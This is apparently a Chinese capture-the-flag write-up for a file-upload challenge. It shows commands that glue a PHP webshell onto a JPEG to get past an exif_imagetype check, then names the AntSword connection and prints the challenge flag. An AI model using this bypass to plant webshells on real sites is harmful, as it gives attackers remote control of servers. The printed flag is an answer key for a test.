注册帐号登录
存在文件上传的地方,上传一句话木马文件
提示exif_imagetype not image!,exif_imagetype是php里通过文件头判断是不是图片,可以通过图片马绕过
exif_imagetype() 读取一个图像的第一个字节并检查其签名。
制作图片马
# win
copy 1.jpg /b + shell.php 1.php
# linux
cat 1.jpg shell.php > 1.php
上传图片马
查看文件路径,上传成功
蚁剑连接图片马成功
得到flag
flag{a5c90492-2361-45e4-a2be-d9cf32f77efc}